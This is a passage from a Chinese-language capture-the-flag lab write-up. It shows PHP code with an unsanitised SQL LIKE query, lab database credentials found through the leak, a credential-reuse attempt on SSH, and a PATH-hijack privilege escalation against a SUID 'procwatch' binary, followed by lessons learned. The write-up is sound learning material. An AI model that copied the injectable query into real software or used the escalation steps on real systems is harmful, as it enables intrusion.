  die('Could not connect: ' . mysql_error());
}
$sql = 'SELECT id, user, position FROM users WHERE user LIKE "%'.$word.'%" ';

mysql_select_db('seth');
$retval = mysql_query( $sql, $conn );
if(! $retval )
{
  die('Could not get data: ' . mysql_error());
}
while($row = mysql_fetch_array($retval, MYSQL_ASSOC))
{
    echo "EMP ID :{$row['id']}  <br> ".
         "EMP NAME : {$row['user']} <br> ".
         "EMP POSITION : {$row['position']} <br> ".
         "--------------------------------<br>";
} 
echo "Fetched data successfully\n";
mysql_close($conn);

?>

泄露出数据库管理员凭据: root:sunnyvale 以及非mysql默认端口3036

尝试碰撞root的ssh

虽然感觉肯定不会这么容易,但还是有必要,因为实际环境中,少有情况会出现数据库root密码与主机root密码相同。尝试碰撞后无果。

尝试连接phpmyadmin获取更多信息

用上面的凭据登录成功,发现一条较为关键提示: 2024-06-19-15-47-23 isis用户的身份是employee,说明其权限可能相对ramses较高,不过这些信息在sqlmap跑的时候也能获取到,至此没有什么新的发现。

权限提升(有部分不明白,待研究)

1
2
3
4
5
6
7
8
9
find / -group ramses -type f 2>/dev/null | grep -v '/proc' 排除/proc  (按照组权限)
cd /var/www/backup
clear
export TERM=xterm-color
./procwatch
# 下面这三步不太懂
ln -s /bin/sh ps
export PATH=.:$PATH
./procwatch

学到的

  • sql注入前手工验证的必要性

观看视频后,发现自己在通过逻辑直接猜测存在sql注入后,然后直接用sqlmap跑,这是不够严谨的,应该先手工测试下,通过页面回显等信息确认sql语句确实被带入到数据库中执行时,简单测试是否能够获取到数据库版本号等基本信息后,接着才去用工具跑

  • 拿到一个加密字符串先不要急着破解,最好先识别清楚,便于减小破解难度

视频中,拿到一个大小写不敏感、由纯字母和数字组成的字符串(即上文一直想要破解的hash)时,可以先判断是否为base64,然后如果用echo -n 加密字符串 | base64 -d后的结果像hash值,可以用hash-identifier对上面命令后的结果再进行识别hash算法